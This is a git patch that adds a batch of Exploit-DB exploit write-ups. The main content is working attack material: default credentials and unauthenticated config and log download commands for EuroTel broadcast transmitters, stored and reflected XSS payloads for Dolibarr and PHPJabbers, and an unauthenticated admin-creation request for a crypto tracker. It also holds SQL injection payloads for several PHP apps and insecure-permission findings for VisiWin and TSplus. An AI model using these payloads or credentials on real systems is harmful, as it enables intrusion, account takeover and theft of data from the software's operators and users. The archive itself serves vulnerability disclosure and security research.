+51349,exploits/php/webapps/51349.txt,"WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)",2023-04-08,"Mirabbas Ağalarov",webapps,php,,2023-04-08,2023-08-19,1,,,,,,
+51554,exploits/php/webapps/51554.txt,"WebsiteBaker v2.13.3 - Directory Traversal",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-08-19,1,,,,,,
+51553,exploits/php/webapps/51553.txt,"WebsiteBaker v2.13.3 - Stored XSS",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-08-19,1,,,,,,
 34541,exploits/php/webapps/34541.txt,"WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection",2010-08-29,MiND,webapps,php,,2010-08-29,2014-09-06,1,,,,,,https://www.securityfocus.com/bid/42842/info
 44686,exploits/php/webapps/44686.txt,"WebSocket Live Chat - Cross-Site Scripting",2018-05-22,"Alireza Norkazemi",webapps,php,,2018-05-22,2018-05-22,0,,,,,,
 7653,exploits/php/webapps/7653.txt,"webSPELL 4 - Authentication Bypass",2009-01-03,anonymous,webapps,php,,2009-01-02,2017-01-11,1,,,,,,

From e07f33f24da6d847fdd5bba3f24f6f01eeecd446 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Tue, 22 Aug 2023 00:16:22 +0000
Subject: [PATCH 08/17] DB: 2023-08-22

17 changes to exploits/shellcodes/ghdb

EuroTel ETL3100 - Transmitter Authorization Bypass (IDOR)
EuroTel ETL3100 - Transmitter Default Credentials
EuroTel ETL3100 - Transmitter Unauthenticated Config/Log Download

Color Prediction Game v1.0 - SQL Injection

Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)

Dolibarr Version 17.0.1 - Stored XSS

Global - Multi School Management System Express v1.0- SQL Injection

OVOO Movie Portal CMS v3.3.3 - SQL Injection

PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities

Taskhub CRM Tool 2.8.6 - SQL Injection

Inosoft VisiWin 7 2022-2.1 - Insecure Folders Permissions
TSPlus 16.0.0.0 - Remote Work Insecure Credential storage
TSplus 16.0.0.0 - Remote Work Insecure Files and Folders
TSplus 16.0.2.14 - Remote Access Insecure Files and Folders Permissions

Linux/x64 - memfd_create ELF loader Shellcode (170 bytes)
---
 exploits/hardware/remote/51684.txt |  43 +++++++++
 exploits/hardware/remote/51685.txt |  54 +++++++++++
 exploits/hardware/remote/51686.txt |  45 +++++++++
 exploits/php/webapps/51683.txt     |  36 +++++++
 exploits/php/webapps/51687.txt     |  31 ++++++
 exploits/php/webapps/51688.txt     |  19 ++++
 exploits/php/webapps/51689.txt     |  53 +++++++++++
 exploits/php/webapps/51690.txt     |  60 ++++++++++++
 exploits/php/webapps/51691.txt     |  37 ++++++++
 exploits/php/webapps/51692.txt     |  37 ++++++++
 exploits/windows/local/51682.txt   |  42 ++++++++
 exploits/windows/remote/51679.txt  | 101 ++++++++++++++++++++
 exploits/windows/remote/51680.txt  | 103 ++++++++++++++++++++
 exploits/windows/remote/51681.txt  |  45 +++++++++
 files_exploits.csv                 |  14 +++
 files_shellcodes.csv               |   1 +
 shellcodes/linux/51693.asm         | 148 +++++++++++++++++++++++++++++
 17 files changed, 869 insertions(+)
 create mode 100644 exploits/hardware/remote/51684.txt
 create mode 100644 exploits/hardware/remote/51685.txt
 create mode 100644 exploits/hardware/remote/51686.txt
 create mode 100644 exploits/php/webapps/51683.txt
 create mode 100644 exploits/php/webapps/51687.txt
 create mode 100644 exploits/php/webapps/51688.txt
 create mode 100644 exploits/php/webapps/51689.txt
 create mode 100644 exploits/php/webapps/51690.txt
 create mode 100644 exploits/php/webapps/51691.txt
 create mode 100644 exploits/php/webapps/51692.txt
 create mode 100644 exploits/windows/local/51682.txt
 create mode 100644 exploits/windows/remote/51679.txt
 create mode 100644 exploits/windows/remote/51680.txt
 create mode 100644 exploits/windows/remote/51681.txt
 create mode 100644 shellcodes/linux/51693.asm

diff --git a/exploits/hardware/remote/51684.txt b/exploits/hardware/remote/51684.txt
new file mode 100644
index 0000000000..b985059ba3
--- /dev/null
+++ b/exploits/hardware/remote/51684.txt
@@ -0,0 +1,43 @@
+#Exploit Title: EuroTel ETL3100 Transmitter Default Credentials
+# Exploit Author: LiquidWorm
+Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L
+Product web page: https://www.eurotel.it | https://www.siel.fm
+Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)
+                  v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)
+
+
+Summary: RF Technology For Television Broadcasting Applications.
+The Series ETL3100 Radio Transmitter provides all the necessary
+features defined by the FM and DAB standards. Two bands are provided
+to easily complain with analog and digital DAB standard. The Series
+ETL3100 Television Transmitter provides all the necessary features
+defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as
+well as the analog TV standards. Three band are provided to easily
+complain with all standard channels, and switch softly from analog-TV
+'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.
+
+Desc: The TV and FM transmitter uses a weak set of default administrative
+credentials that can be guessed in remote password attacks and gain full
+control of the system.
+
+Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)
+           lighttpd/1.4.26
+           PHP/5.4.3
+           Xilinx Virtex Machine
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2023-5782
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5782.php
+
+
+29.04.2023
+
+--
+
+
+Using Username "user" and Password "etl3100rt1234" the operator will enter in the WEB interface in a read-only mode.
+Using Username "operator" and Password "2euro21234" the operator will be able also to modify some parameters in the WEB pages.
\ No newline at end of file
diff --git a/exploits/hardware/remote/51685.txt b/exploits/hardware/remote/51685.txt
new file mode 100644
index 0000000000..220ae747cf
--- /dev/null
+++ b/exploits/hardware/remote/51685.txt
@@ -0,0 +1,54 @@
+# Exploit Title: EuroTel ETL3100 - Transmitter Authorization Bypass (IDOR)
+# Exploit Author: LiquidWorm
+
+Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L
+Product web page: https://www.eurotel.it | https://www.siel.fm
+Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)
+                  v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)
+
+
+Summary: RF Technology For Television Broadcasting Applications.
+The Series ETL3100 Radio Transmitter provides all the necessary
+features defined by the FM and DAB standards. Two bands are provided
+to easily complain with analog and digital DAB standard. The Series
+ETL3100 Television Transmitter provides all the necessary features
+defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as
+well as the analog TV standards. Three band are provided to easily
+complain with all standard channels, and switch softly from analog-TV
+'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.
+
+Desc: The application is vulnerable to insecure direct object references
+that occur when the application provides direct access to objects based
+on user-supplied input. As a result of this vulnerability attackers can
+bypass authorization and access the hidden resources on the system and
+execute privileged functionalities.
+
+Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)
+           lighttpd/1.4.26
+           PHP/5.4.3
+           Xilinx Virtex Machine
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2023-5783
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5783.php
+
+
+29.04.2023
+
+--
+
+
+See URL:
+
+TARGET/exciter.php?page=0
+TARGET/exciter.php?page=1
+TARGET/exciter.php?page=2
+...
+...
+TARGET/exciter.php?page=29
+TARGET/exciter.php?page=30
+TARGET/exciter.php?page=31
\ No newline at end of file
diff --git a/exploits/hardware/remote/51686.txt b/exploits/hardware/remote/51686.txt
new file mode 100644
index 0000000000..1d161c7b6d
--- /dev/null
+++ b/exploits/hardware/remote/51686.txt
@@ -0,0 +1,45 @@
+# Exploit Title: EuroTel ETL3100 - Transmitter Unauthenticated Config/Log Download
+# Exploit Author: LiquidWorm
+
+Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L
+Product web page: https://www.eurotel.it | https://www.siel.fm
+Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)
+                  v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)
+
+
+Summary: RF Technology For Television Broadcasting Applications.
+The Series ETL3100 Radio Transmitter provides all the necessary
+features defined by the FM and DAB standards. Two bands are provided
+to easily complain with analog and digital DAB standard. The Series
+ETL3100 Television Transmitter provides all the necessary features
+defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as
+well as the analog TV standards. Three band are provided to easily
+complain with all standard channels, and switch softly from analog-TV
+'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.
+
+Desc: The TV and FM transmitter suffers from an unauthenticated
+configuration and log download vulnerability. This will enable
+the attacker to disclose sensitive information and help him in
+authentication bypass, privilege escalation and full system access.
+
+Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)
+           lighttpd/1.4.26
+           PHP/5.4.3
+           Xilinx Virtex Machine
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2023-5784
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5784.php
+
+
+29.04.2023
+
+--
+
+
+$ curl http://192.168.2.166/cfg_download.php -o config.tgz
+$ curl http://192.168.2.166/exciter/log_download.php -o log.tar.gz
\ No newline at end of file
diff --git a/exploits/php/webapps/51683.txt b/exploits/php/webapps/51683.txt
new file mode 100644
index 0000000000..daf87b94a2
--- /dev/null
+++ b/exploits/php/webapps/51683.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Dolibarr Version 17.0.1 - Stored XSS
+# Dork:
+# Date: 2023-08-09
+# Exploit Author: Furkan Karaarslan
+# Category : Webapps
+# Vendor Homepage: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php
+# Version: 17.0.1 (REQUIRED)
+# Tested on: Windows/Linux
+# CVE :
+
+-----------------------------------------------------------------------------
+Requests
+
+POST /dolibarr-17.0.1/htdocs/user/note.php HTTP/1.1
+Host: 127.0.0.1
+Content-Length: 599
+Cache-Control: max-age=0
+sec-ch-ua:
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: ""
+Upgrade-Insecure-Requests: 1
+Origin: http://127.0.0.1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php?action=editnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: 5c8ccd93504819395bd9eb83add769eb=g6sujc3ss8cj53cvk84qv0jgol; f758a1cd0925196cd7746824e3df122b=u04rsmdqgrdpr2kduo49gl0rmh; DOLSESSID_18109f368bbc82f2433d1d6c639db71bb97e2bd1=sud22bsu9sbqqc4bgcloki2eht
+Connection: close
+
+token=4b1479ad024e82d298b395bfab9b1916&action=setnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1&note_public=%3Ca+onscrollend%3Dalert%281%29+style%3D%22display%3Ablock%3Boverflow%3Aauto%3Bborder%3A1px+dashed%3Bwidth%3A500px%3Bheight%3A100px%3B%22%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cspan+id%3Dx%3Etest%3C%2Fspan%3E%3C%2Fa%3E&modify=De%C4%9Fi%C5%9Ftir
\ No newline at end of file
diff --git a/exploits/php/webapps/51687.txt b/exploits/php/webapps/51687.txt
new file mode 100644
index 0000000000..fc0c1fede7
--- /dev/null
+++ b/exploits/php/webapps/51687.txt
@@ -0,0 +1,31 @@
+# Exploit Title: PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities
+# Date: 09/08/2023
+# Exploit Author: Kerimcan Ozturk
+# Vendor Homepage: https://www.phpjabbers.com/
+# Software Link: https://www.phpjabbers.com/business-directory-script/
+# Version: 3.2
+# Tested on: Windows 10 Pro
+## Description
+
+Technical Detail / POC
+==========================
+Login Account
+Go to Property Page (
+https://website/index.php?controller=pjAdminListings&action=pjActionUpdate)
+Edit Any Property (
+https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57
+)
+
+[1] Cross-Site Scripting (XSS)
+
+Request:
+https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id=
+"<script><image/src/onerror=prompt(8)>
+
+[2] Cross-Site Request Forgery
+
+Request:
+https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id=
+"<script><font%20color="green">Kerimcan%20Ozturk</font>
+
+Best Regards
\ No newline at end of file
diff --git a/exploits/php/webapps/51688.txt b/exploits/php/webapps/51688.txt
new file mode 100644
index 0000000000..af724604c9
--- /dev/null
+++ b/exploits/php/webapps/51688.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)
+# Date: 11.08.2023
+# Exploit Author: 0xBr
+# Software Link: https://codecanyon.net/item/crypto-currency-tracker-prices-charts-news-icos-info-and-more/21588008
+# Version: <=9.5
+# CVE: CVE-2023-37759
+
+POST /en/user/register HTTP/2
+Host: localhost
+Cookie: XSRF-TOKEN=[TOKEN]; laravel_session=[LARAVEL_SESSION]; SELECTED_CURRENCY=USD; SELECTED_CURRENCY_PRICE=1; cookieconsent_status=dismiss
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 756
+
+_token=[_TOKEN]&name=testing&role_id=1&email=testing%40testing.testing&password=testing&g-recaptcha-response=[G-RECAPTCHA-RESPONSE]&submit_register=Register
+
+-- Sent with https://mailfence.com  Secure and private email
\ No newline at end of file
diff --git a/exploits/php/webapps/51689.txt b/exploits/php/webapps/51689.txt
new file mode 100644
index 0000000000..a0bbf3bf5a
--- /dev/null
+++ b/exploits/php/webapps/51689.txt
@@ -0,0 +1,53 @@
+# Exploit Title: Color Prediction Game v1.0 - SQL Injection
+# Date: 2023-08-12
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.codester.com/items/44411/color-prediction-game-php-script
+# Tested on: Kali Linux & MacOS
+# CVE: N/A
+
+### Request ###
+
+POST /loginNow.php HTTP/1.1
+Host: localhost
+Cookie: PHPSESSID=250594265b833a4d3a7adf6e1c136fe2
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)
+Gecko/20100101 Firefox/116.0
+Accept: */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data;
+boundary=---------------------------395879129218961020344050490865
+Content-Length: 434
+Origin: http://localhost
+Referer: http://localhost/login.php
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+Connection: close
+-----------------------------395879129218961020344050490865
+Content-Disposition: form-data; name="login_mobile"
+4334343433
+-----------------------------395879129218961020344050490865
+Content-Disposition: form-data; name="login_password"
+123456
+-----------------------------395879129218961020344050490865
+Content-Disposition: form-data; name="action"
+login
+-----------------------------395879129218961020344050490865--
+
+### Parameter & Payloads ###
+Parameter: MULTIPART login_mobile ((custom) POST)
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: -----------------------------395879129218961020344050490865
+Content-Disposition: form-data; name="login_mobile"
+4334343433' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW
+-----------------------------395879129218961020344050490865
+Content-Disposition: form-data; name="login_password"
+123456
+-----------------------------395879129218961020344050490865
+Content-Disposition: form-data; name="action"
+login
+-----------------------------395879129218961020344050490865--
\ No newline at end of file
diff --git a/exploits/php/webapps/51690.txt b/exploits/php/webapps/51690.txt
new file mode 100644
index 0000000000..9af1c6d3d0
--- /dev/null
+++ b/exploits/php/webapps/51690.txt
@@ -0,0 +1,60 @@
+# Exploit Title:  Global - Multi School Management System Express v1.0- SQL Injection
+# Date: 2023-08-12
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://codecanyon.net/item/global-multi-school-management-system-express/21975378
+# Tested on: Kali Linux & MacOS
+# CVE: N/A
+
+### Request ###
+POST /report/balance HTTP/1.1
+Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
+Accept: */*
+X-Requested-With: XMLHttpRequest
+Referer: http://localhost
+Cookie: gmsms=b8d36491f08934ac621b6bc7170eaef18290469f
+Content-Length: 472
+Accept-Encoding: gzip,deflate,br
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
+Host: localhost
+Connection: Keep-alive
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="school_id"
+0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="academic_year_id"
+
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="group_by"
+
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="date_from"
+
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="date_to"
+
+------------YWJkMTQzNDcw--
+
+### Parameter & Payloads ###
+Parameter: MULTIPART school_id ((custom) POST)
+Type: error-based
+Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY
+clause (EXTRACTVALUE)
+Payload: ------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="school_id"
+0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z' AND
+EXTRACTVALUE(1586,CONCAT(0x5c,0x71766b6b71,(SELECT
+(ELT(1586=1586,1))),0x716a627071)) AND 'Dyjx'='Dyjx
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="academic_year_id"
+
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="group_by"
+
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="date_from"
+
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="date_to"
+
+------------YWJkMTQzNDcw–
\ No newline at end of file
diff --git a/exploits/php/webapps/51691.txt b/exploits/php/webapps/51691.txt
new file mode 100644
index 0000000000..79916f4b6f
--- /dev/null
+++ b/exploits/php/webapps/51691.txt
@@ -0,0 +1,37 @@
+# Exploit Title: OVOO Movie Portal CMS v3.3.3 - SQL Injection
+# Date: 2023-08-12
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://codecanyon.net/item/ovoomovie-video-streaming-cms-with-unlimited-tvseries/20180569
+# Tested on: Kali Linux & MacOS
+# CVE: N/A
+
+### Request ###
+POST /filter_movies/1 HTTP/2
+Host: localhost
+Cookie: ci_session=tiic5hcli8v3qkg1chgj0dqpou9495us
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)
+Gecko/20100101 Firefox/116.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/movies.html
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 60
+Origin: htts://localhost
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+action=fetch_data&minimum_rating=1&maximum_rating=6.8&page=1
+
+### Parameter & Payloads ###
+Parameter: maximum_rating (POST)
+Type: boolean-based blind
+Title: AND boolean-based blind - WHERE or HAVING clause
+Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND
+2238=2238&page=1
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND (SELECT
+4101 FROM (SELECT(SLEEP(5)))FLwc)&page=1
\ No newline at end of file
diff --git a/exploits/php/webapps/51692.txt b/exploits/php/webapps/51692.txt
new file mode 100644
index 0000000000..76a7a53dd8
--- /dev/null
+++ b/exploits/php/webapps/51692.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Taskhub CRM Tool 2.8.6 - SQL Injection
+# Date: 2023-08-12
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor:
+https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874
+# Tested on: Kali Linux & MacOS
+# CVE: N/A
+
+### Request ###
+GET /projects?filter=notstarted HTTP/1.1
+Host: localhost
+Cookie: csrf_cookie_name=a3e6a7d379a3e5f160d72c182ff8a8c8;
+ci_session=tgu03eoatvsonh7v986g1vj57b8sufh9
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)
+Gecko/20100101 Firefox/116.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+### Parameter & Payloads ###
+Parameter: filter (GET)
+Type: boolean-based blind
+Title: AND boolean-based blind - WHERE or HAVING clause
+Payload: filter=notstarted' AND 2978=2978 AND 'vMQO'='vMQO
+Type: error-based
+Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY
+clause (EXTRACTVALUE)
+Payload: filter=notstarted' AND
+EXTRACTVALUE(5313,CONCAT(0x5c,0x716a707a71,(SELECT
+(ELT(5313=5313,1))),0x71787a6b71)) AND 'ronQ'='ronQ
\ No newline at end of file
diff --git a/exploits/windows/local/51682.txt b/exploits/windows/local/51682.txt
new file mode 100644
index 0000000000..105c6f554e
--- /dev/null
+++ b/exploits/windows/local/51682.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Inosoft VisiWin 7 2022-2.1 - Insecure Folders Permissions
+Privilege Escalation
+# Date: 2023-08-09
+# Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia
+# Vendor Homepage: https://www.inosoft.com/
+# Version: Up to 2022-2.1 (Runtime RT7.3 RC3 20221209.5)
+# Tested on: Windows
+# CVE: CVE-2023-31468
+
+Inosoft VisiWin is a completely open system with a configurable range of
+functions. It combines all features of classic HMI software with
+unlimited programming possibilities.
+The installation of the solution will create insecure folder, and this
+could allow a malicious user to manipulate file content or change
+legitimate files (e.g., VisiWin7.Server.Manager.exe which runs with
+SYSTEM privileges) to compromise a system or to gain elevated
+privileges.
+
+This is the list of insecure files and folders with their respective
+permissions:
+
+C:\>icacls "C:\Program Files (x86)\INOSOFT GmbH"
+C:\Program Files (x86)\INOSOFT GmbH BUILTIN\Administrators:(OI)(CI)(F)
+                                     Everyone:(OI)(CI)(F)
+                                     NT AUTHORITY\SYSTEM:(OI)(CI)(F)
+
+Successfully processed 1 files; Failed processing 0 files
+
+C:\>
+
+--------------------------------------------------------------------------------------------------------------------------------------------------------
+
+C:\>icacls "C:\Program Files (x86)\INOSOFT GmbH\VisiWin7\Runtime\VisiWin7.Server.Manager.exe"
+C:\Program Files (x86)\INOSOFT GmbH\VisiWin 7\Runtime\VisiWin7.Server.Manager.exe BUILTIN\Administrators:(I)(F)
+
+          Everyone:(I)(F)
+
+          NT AUTHORITY\SYSTEM:(I)(F)
+
+Successfully processed 1 files; Failed processing 0 files
+
+C:\>
\ No newline at end of file
diff --git a/exploits/windows/remote/51679.txt b/exploits/windows/remote/51679.txt
new file mode 100644
index 0000000000..4a700ec799
--- /dev/null
+++ b/exploits/windows/remote/51679.txt
@@ -0,0 +1,101 @@
+# Exploit Title: TSplus 16.0.2.14 - Remote Access Insecure Files and Folders Permissions
+# Date: 2023-08-09
+# Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia
+# Vendor Homepage: https://tsplus.net/
+# Version: Up to 16.0.2.14
+# Tested on: Windows
+# CVE : CVE-2023-31067
+
+TSplus Remote Access (v. 16.0.2.14) is an alternative to Citrix and
+Microsoft RDS for remote desktop access and Windows application
+delivery. Web-enable your legacy apps, create SaaS solutions or remotely
+access your centralized corporate tools and files.
+The TSplus Remote Access solution comes with an embedded web server to
+allow remote users to easely connect remotely.
+However, insecure file and folder permissions are set and this could
+allow a malicious user to manipulate file content (e.g.: changing the
+code of html pages or js scripts) or change legitimate files (e.g.
+Setup-VirtualPrinter-Client.exe) in order to compromise a system or to
+gain elevated privileges.
+
+This is the list of insecure files and folders with their respective
+permissions:
+Everyone:(OI)(CF)(F) and Everyone(F)
+Permission: Everyone:(OI)(CI)(F)
+
+C:\Program Files (x86)\TSplus\Clients\www
+C:\Program Files (x86)\TSplus\Clients\www\addons
+C:\Program Files (x86)\TSplus\Clients\www\ConnectionClient
+C:\Program Files (x86)\TSplus\Clients\www\downloads
+C:\Program Files (x86)\TSplus\Clients\www\prints
+C:\Program Files (x86)\TSplus\Clients\www\RemoteAppClient
+C:\Program Files (x86)\TSplus\Clients\www\software
+C:\Program Files (x86)\TSplus\Clients\www\var
+C:\Program Files (x86)\TSplus\Clients\www\cgi-bin\remoteapp
+C:\Program Files (x86)\TSplus\Clients\www\downloads\shared
+C:\Program Files (x86)\TSplus\Clients\www\software\java
+C:\Program Files (x86)\TSplus\Clients\www\software\js
+C:\Program Files (x86)\TSplus\Clients\www\software\html5\jwres
+C:\Program Files (x86)\TSplus\Clients\www\software\html5\locales
+C:\Program Files (x86)\TSplus\Clients\www\software\html5\imgs\topmenu
+C:\Program Files (x86)\TSplus\Clients\www\software\html5\imgs\key\parts
+C:\Program Files (x86)\TSplus\Clients\www\software\java\img
+C:\Program Files (x86)\TSplus\Clients\www\software\java\third
+C:\Program Files (x86)\TSplus\Clients\www\software\java\img\cp
+C:\Program Files (x86)\TSplus\Clients\www\software\java\img\srv
+C:\Program Files (x86)\TSplus\Clients\www\software\java\third\images
+C:\Program Files (x86)\TSplus\Clients\www\software\java\third\js
+C:\Program Files
+(x86)\TSplus\Clients\www\software\java\third\images\bramus
+C:\Program Files
+(x86)\TSplus\Clients\www\software\java\third\js\prototype
+C:\Program Files (x86)\TSplus\Clients\www\var\log
+C:\Program Files (x86)\TSplus\UserDesktop\themes
+C:\Program Files (x86)\TSplus\UserDesktop\themes\BlueBar
+C:\Program Files (x86)\TSplus\UserDesktop\themes\Default
+C:\Program Files (x86)\TSplus\UserDesktop\themes\GreyBar
+C:\Program Files (x86)\TSplus\UserDesktop\themes\Logon
+C:\Program Files (x86)\TSplus\UserDesktop\themes\MenuOnTop
+C:\Program Files (x86)\TSplus\UserDesktop\themes\Seamless
+C:\Program Files (x86)\TSplus\UserDesktop\themes\ThinClient
+C:\Program Files (x86)\TSplus\UserDesktop\themes\Vista
+
+------------------------------------------------------------------------------
+
+Permission: Everyone:(F)
+
+C:\Program Files (x86)\TSplus\Clients\www\all.min.css
+C:\Program Files (x86)\TSplus\Clients\www\custom.css
+C:\Program Files (x86)\TSplus\Clients\www\popins.css
+C:\Program Files (x86)\TSplus\Clients\www\robots.txt
+C:\Program Files
+(x86)\TSplus\Clients\www\addons\Setup-VirtualPrinter-Client.exe
+C:\Program Files (x86)\TSplus\Clients\www\cgi-bin\hb.exe.config
+C:\Program Files
+(x86)\TSplus\Clients\www\cgi-bin\SessionPrelaunch.Common.dll.config
+C:\Program Files (x86)\TSplus\Clients\www\cgi-bin\remoteapp\index.html
+C:\Program Files (x86)\TSplus\Clients\www\RemoteAppClient\index.html
+C:\Program Files (x86)\TSplus\Clients\www\software\common.css
+C:\Program Files
+(x86)\TSplus\Clients\www\software\html5\jwres\jwwebsockify.jar
+C:\Program Files (x86)\TSplus\Clients\www\software\html5\jwres\web.jar
+C:\Program Files
+(x86)\TSplus\Clients\www\software\html5\own\exitlist.html
+C:\Program Files
+(x86)\TSplus\Clients\www\software\html5\own\exitupload.html
+C:\Program Files
+(x86)\TSplus\Clients\www\software\html5\own\getlist.html
+C:\Program Files
+(x86)\TSplus\Clients\www\software\html5\own\getupload.html
+C:\Program Files
+(x86)\TSplus\Clients\www\software\html5\own\postupload.html
+C:\Program Files
+(x86)\TSplus\Clients\www\software\html5\own\uploaderr.html
+C:\Program Files (x86)\TSplus\Clients\www\software\java\index.html
